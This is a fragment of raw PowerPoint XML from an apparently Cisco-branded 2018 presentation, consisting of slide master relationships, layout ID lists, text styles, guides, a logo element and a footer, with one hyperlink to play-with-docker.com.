            <a:lvl5pPr marL="1082423" indent="-168236">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97727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slideLayout" Target="../slideLayouts/slideLayout71.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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout74.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout72.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout77.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout76.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 Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout75.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout40.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.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slideLayout" Target="../slideLayouts/slideLayout70.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7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slideLayout" Target="../slideLayouts/slideLayout116.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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout119.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout117.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout122.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout121.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43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout120.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout85.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout80.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46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout97.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11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slideLayout" Target="../slideLayouts/slideLayout161.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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout164.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout162.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout167.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout166.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43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout165.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout130.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.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slideLayout" Target="../slideLayouts/slideLayout160.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout142.xml"/><Relationship Id="rId41"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5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA589F0-3B49-4242-8BBA-7EC052A95B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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bg2">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461844462"/>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Lst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="684213"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8" orient="horz" pos="2892">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="336">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="5448">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="757">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="335">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" pos="2876">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" orient="horz" pos="104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105EC5-0874-7E40-A126-0FC2CA189B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId47" cstate="print">
            <a:duotone>
              <a:schemeClr val="bg2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-3307"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436752" y="4767263"/>
            <a:ext cx="459137" cy="335276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026"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p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3401050" cy="154518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="61586" tIns="30792" rIns="61586" bIns="30792" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="610729" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="600" spc="20" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="6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3754700675"/>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739" r:id="rId40"/>
    <p:sldLayoutId id="2147483740" r:id="rId41"/>
    <p:sldLayoutId id="2147483741" r:id="rId42"/>
    <p:sldLayoutId id="2147483742" r:id="rId43"/>
    <p:sldLayoutId id="2147483837" r:id="rId44"/>
    <p:sldLayoutId id="2147483838" r:id="rId45"/>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txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="684196"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189"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378"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566"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754"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59" indent="-169859" algn="l" defTabSz="684196"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66" indent="-215894" algn="l" defTabSz="684196"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789" indent="-169859" algn="l" defTabSz="684196"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25" indent="-169859" algn="l" defTabSz="684196"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61" indent="-169859" algn="l" defTabSz="684196"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34" indent="-171441" algn="l" defTabSz="685760"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21" indent="-171418" algn="l" defTabSz="685760"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160" indent="0" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="1500" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2914481" indent="-171441" algn="l" defTabSz="68576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60" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="342878" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="685760" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1028639" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1371521" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1714398" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2057281" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2400160" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2743042" algn="l" defTabSz="68576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105EC5-0874-7E40-A126-0FC2CA189B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId47" cstate="print">
            <a:duotone>
              <a:schemeClr val="bg2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-3307"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436752" y="4767263"/>
            <a:ext cx="459137" cy="335276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026"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p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3401050" cy="154518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="61586" tIns="30792" rIns="61586" bIns="30792" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="610729" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="600" spc="20" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="6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1164414899"/>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779" r:id="rId34"/>
    <p:sldLayoutId id="2147483780" r:id="rId35"/>
    <p:sldLayoutId id="2147483781" r:id="rId36"/>
    <p:sldLayoutId id="2147483782" r:id="rId37"/>
    <p:sldLayoutId id="2147483783" r:id="rId38"/>
    <p:sldLayoutId id="2147483784" r:id="rId39"/>
    <p:sldLayoutId id="2147483785" r:id="rId40"/>
    <p:sldLayoutId id="2147483786" r:id="rId41"/>
    <p:sldLayoutId id="2147483787" r:id="rId42"/>
    <p:sldLayoutId id="2147483788" r:id="rId43"/>
    <p:sldLayoutId id="2147483789" r:id="rId44"/>
    <p:sldLayoutId id="2147483790" r:id="rId45"/>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txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="684196"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189"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378"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566"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754"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59" indent="-169859" algn="l" defTabSz="684196"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66" indent="-215894" algn="l" defTabSz="684196"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789" indent="-169859" algn="l" defTabSz="684196"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25" indent="-169859" algn="l" defTabSz="684196"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61" indent="-169859" algn="l" defTabSz="684196"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34" indent="-171441" algn="l" defTabSz="685760"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21" indent="-171418" algn="l" defTabSz="685760"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160" indent="0" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="1500" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2914481" indent="-171441" algn="l" defTabSz="68576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60" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="342878" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="685760" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1028639" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1371521" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1714398" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2057281" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2400160" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2743042" algn="l" defTabSz="68576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105EC5-0874-7E40-A126-0FC2CA189B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId47" cstate="print">
            <a:duotone>
              <a:schemeClr val="bg2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-3307"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436752" y="4767263"/>
            <a:ext cx="459137" cy="335276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026"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p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3401050" cy="154518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="61586" tIns="30792" rIns="61586" bIns="30792" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="610729" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="600" spc="20" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="CiscoSans Thin"/>
              </a:rPr>
              <a:t>© 2018  Cisco and/or its affiliates. All rights reserved.   Cisco Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2097587492"/>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 id="2147483815" r:id="rId24"/>
    <p:sldLayoutId id="2147483816" r:id="rId25"/>
    <p:sldLayoutId id="2147483817" r:id="rId26"/>
    <p:sldLayoutId id="2147483818" r:id="rId27"/>
    <p:sldLayoutId id="2147483819" r:id="rId28"/>
    <p:sldLayoutId id="2147483820" r:id="rId29"/>
    <p:sldLayoutId id="2147483821" r:id="rId30"/>
    <p:sldLayoutId id="2147483822" r:id="rId31"/>
    <p:sldLayoutId id="2147483823" r:id="rId32"/>
    <p:sldLayoutId id="2147483824" r:id="rId33"/>
    <p:sldLayoutId id="2147483825" r:id="rId34"/>
    <p:sldLayoutId id="2147483826" r:id="rId35"/>
    <p:sldLayoutId id="2147483827" r:id="rId36"/>
    <p:sldLayoutId id="2147483828" r:id="rId37"/>
    <p:sldLayoutId id="2147483829" r:id="rId38"/>
    <p:sldLayoutId id="2147483830" r:id="rId39"/>
    <p:sldLayoutId id="2147483831" r:id="rId40"/>
    <p:sldLayoutId id="2147483832" r:id="rId41"/>
    <p:sldLayoutId id="2147483833" r:id="rId42"/>
    <p:sldLayoutId id="2147483834" r:id="rId43"/>
    <p:sldLayoutId id="2147483835" r:id="rId44"/>
    <p:sldLayoutId id="2147483836" r:id="rId45"/>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txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="684196"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189"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378"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566"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754"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59" indent="-169859" algn="l" defTabSz="684196"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66" indent="-215894" algn="l" defTabSz="684196"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789" indent="-169859" algn="l" defTabSz="684196"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25" indent="-169859" algn="l" defTabSz="684196"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61" indent="-169859" algn="l" defTabSz="684196"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34" indent="-171441" algn="l" defTabSz="685760"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21" indent="-171418" algn="l" defTabSz="685760"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160" indent="0" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="1500" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2914481" indent="-171441" algn="l" defTabSz="68576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60" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="342878" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="685760" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1028639" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1371521" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1714398" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2057281" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2400160" algn="l" defTabSz="685760" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2743042" algn="l" defTabSz="68576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hyperlink" Target="http://play-with-docker.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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4.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4.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4.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4.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5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54.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54.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54.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0.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54.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54.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54.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4.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
